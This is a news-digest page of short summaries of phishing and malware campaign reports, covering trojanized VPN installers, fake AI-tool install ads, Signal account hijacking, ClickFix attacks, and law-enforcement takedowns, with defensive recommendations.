All news with #phishing tag

🔒 Microsoft disclosed a credential-theft campaign that uses SEO poisoning to push trojanized VPN clients impersonating legitimate enterprise software. Attackers hosted ZIPs on GitHub containing MSI installers that sideload malicious DLLs and deploy a Hyrax variant, presenting a fake sign-in dialog to harvest VPN credentials. Microsoft removed the repositories and revoked the signing certificate; organizations should enable MFA and verify software sources.

🔍 An Interpol-led operation, Operation Synergia III, sinkholed tens of thousands of IP addresses and seized servers linked to global cybercrime between July 2025 and January 2026. Authorities from 72 countries made 94 arrests and seized 212 electronic devices, disrupting thousands of phishing and fraud sites including a large 33,000-site network identified in Macau. The action builds on earlier Synergia efforts and highlights the importance of international cooperation and private-sector partnerships to dismantle criminal infrastructures.

🔍 Microsoft warns that the cybercriminal group Storm-2561 is poisoning search results to distribute trojanized VPN clients that harvest corporate credentials. The campaign redirects victims to digitally signed malware hosted on GitHub and then opens legitimate vendor sites to minimize detection. The installer side-loads malicious DLLs — including a variant of the Hyrax infostealer — to extract VPN credentials and achieve persistence via the RunOnce registry key. Microsoft recommends enforcing multifactor authentication, disabling browser password syncing on managed devices, and running endpoint detection and response in block mode with network and web protections enabled.

🔒 Loblaw Companies Limited has detected an intrusion into a contained, non-critical portion of its IT network and confirmed that a criminal third party accessed basic customer information. The exposed data includes names, phone numbers, and email addresses, which could be used for phishing and fraud. Loblaw says there is no evidence that financial information, health data, or account passwords were compromised and that PC Financial has not been impacted. The company has automatically logged customers out, urges users to sign in again and change passwords, and continues to investigate.

🔒 Microsoft Threat Intelligence attributes a mid‑January 2026 credential theft campaign to the cybercriminal group Storm‑2561, which used SEO poisoning to surface malicious ZIP files masquerading as legitimate enterprise VPN installers. The ZIPs contained an MSI that side‑loaded signed trojan DLLs (dwmapi.dll and inspector.dll) which harvested VPN credentials and exfiltrated configuration data to attacker infrastructure. The binaries were signed with a certificate issued to Taiyuan Lihua Near Information Technology Co., Ltd. (now revoked), and the installers mimicked a Pulse Secure client to trick users; GitHub hosts were used but have been removed.

🔒 Kaspersky researchers uncovered malicious Google Search ads that mimic documentation for popular AI assistants (for example, Claude Code, OpenClaw and Doubao) to trick users into running installer commands. The fake guides prompt victims to execute commands that deploy AMOS on macOS (via curl) or the Amatera infostealer on Windows (via mshta.exe), which exfiltrates browser data, crypto-wallets and files to a remote server. Organizations should warn staff, centrally manage access to AI tools and maintain endpoint protections.

🔐 Modern phishing increasingly hides behind legitimate infrastructure and encrypted HTTPS, making static checks insufficient. The piece recommends a three-part investigation model — safe interaction, automation, and in-sandbox SSL decryption — so SOCs can observe full attack flows, extract actionable IOCs, and reach evidence-based verdicts quickly. This approach reduces analyst load and helps detect identity-driven compromise earlier.

🔒 Signal has confirmed that attackers have hijacked some user accounts by tricking victims into handing over verification codes or linking a second device. The company says its encryption and central infrastructure remain uncompromised and that the campaign relies on social engineering rather than exploiting software vulnerabilities. Targeted users received in-app messages purporting to be a "Signal Security Support Chatbot" or were sent QR codes and links that secretly link an attacker’s device. Review Settings > Linked Devices and never share verification codes or your PIN.

🛡️ Attackers increasingly treat high-volume phishing as a weapon, flooding Security Operations Centers to exhaust analysts and hide targeted spear-phish. The article argues defenders must move from rule-based automation to decision-ready investigations—transparent, auditable agentic AI that produces concise verdicts and evidence. This reduces analyst fatigue, restores rapid response, and limits the window for attacker success.

📄 Researchers at Aryaka report a campaign distributing malicious resumés with ISO attachments to HR teams. When mounted, an included .lnk executes obfuscated PowerShell that extracts payloads from steganographic images and sideloads a DLL via a signed app. The malware includes a module called BlackSanta and leverages a BYOVD technique to disable EDR. Organizations should restrict resume formats and harden HR processes.

🔒 Microsoft Defender Experts describe the Contagious Interview campaign, a long-running social engineering operation that delivers malware through staged developer recruitment processes. Threat actors pose as recruiters and persuade victims to clone and execute NPM packages or to trust repository tasks in Visual Studio Code that then fetch backdoors such as Invisible Ferret and FlexibleFerret. The operation targets developer endpoints, source-control credentials, and CI/CD access by weaponizing trusted hiring workflows. Microsoft recommends isolating coding tests, pre-reviewing recruiter repositories, restricting runtimes, protecting secrets, and hunting for editor-to-shell execution chains.

🔒 Rapid7 has identified a widespread campaign that compromises legitimate WordPress websites to infect visitors with infostealer malware. Attackers display a convincing fake Cloudflare CAPTCHA and use the ClickFix social‑engineering trick to prompt victims to paste commands into Windows Run, initiating staged downloads. Observed payloads include Vidar, Impure, Vodka and Double Donut. Site administrators are urged to update components, enable MFA, use strong passwords and avoid executing untrusted code on credential-bearing devices.

🤖 GenAI has accelerated social engineering and phishing, allowing attackers to produce hyper-personalized messages, convincingly cloned executive voices, and realistic video impersonations in seconds. Deepfake incidents have shifted from online curiosity to tangible business risk, causing financial loss and operational disruption while making identity verification on everyday collaboration platforms increasingly difficult. To address these threats, Check Point Services has expanded its training portfolio and advocates for modern defenses and smarter awareness programs designed for the realities of the AI era.

🔍 ESET positions its threat intelligence and telemetry as essential tools for organizations facing increasingly sophisticated cyber threats, including AI-enabled attacks and convincing deepfakes. ESET Telemetry reports a 12% decline in overall detections in India (Jan–Aug 2025), but ransomware surged 70% from H2 2024 to H1 2025 and phishing remains the most common vector. The vendor bundles endpoint, XDR, identity protection, MDR, and analyst-driven APT reporting to help CIOs and CISOs stay ahead.

🛡️ Infoblox reports a novel phishing evasion technique that leverages the .arpa reverse-DNS namespace and IPv6-to-IPv4 tunneling to host malicious content on infrastructure-only names. The actor created forward A/AAAA records for reverse DNS names—using services tied to Hurricane Electric and Cloudflare—so links appear to originate from trusted infrastructure, bypassing reputation checks and many security controls. Clicks redirected victims to credential- and payment-stealing landing pages. Infoblox recommends audits, DNS restrictions, and targeted detection for ip6.arpa traffic.

🔐 Researchers at BlueVoyant describe a Microsoft Teams phishing campaign that social-engineers employees into initiating Quick Assist remote sessions to install a newly observed backdoor, A0Backdoor. Attackers deliver digitally signed MSI installers and use DLL sideloading with legitimate Microsoft binaries to load a malicious hostfxr.dll that decrypts and runs shellcode. The backdoor fingerprints hosts, communicates with command-and-control over DNS MX queries with encoded subdomains, and has been observed targeting financial and healthcare organizations.

🔐Russian state-sponsored actors are tied to a targeted phishing campaign that hijacks Signal and WhatsApp accounts to monitor messages of government officials, military personnel, and journalists. The Dutch MIVD and AIVD warn attackers use fake support chats, SMS verification-code prompts, Signal PIN requests, and malicious QR links to link attacker devices. Signal says its infrastructure is intact and urges users never to share codes or PINs and to review linked devices immediately.

⚠️ The FBI warns that criminals are impersonating city and county planning and zoning officials to phish businesses and individuals with active land-use or permit applications. Victims receive emails referencing permit details, zoning application numbers, or property addresses and are instructed to pay invoices via wire transfers, peer-to-peer platforms, or cryptocurrency, often pressured with urgency. The agency urges recipients to verify sender domains, call local government offices to confirm fees, and report incidents to the IC3.

🔒 The UK government will establish an Online Crime Centre in April to disrupt large-scale cyber-enabled fraud by combining expertise from government, intelligence agencies, police, banks, mobile networks and major tech firms. The centre will identify and shut down scam accounts, websites and phone numbers, block scam texts, freeze criminal accounts and target overseas scam compounds. The strategy also plans to deploy AI for fraud detection and scam-baiting chatbots to gather intelligence, while introducing a new fraud victims charter to standardise support and reimbursements.

🔒 A Ghanaian national, Derrick Van Yeboah, has pleaded guilty to conspiracy in a global fraud ring blamed for over $100 million in victim losses. Prosecutors say Van Yeboah impersonated romantic partners and corporate leaders to induce victims and orchestrated laundering of stolen funds, accounting for roughly 10% of the operation's take. He faces up to 20 years in prison and agreed to $10.1m in restitution and forfeiture; his plea follows extradition and indictment last year.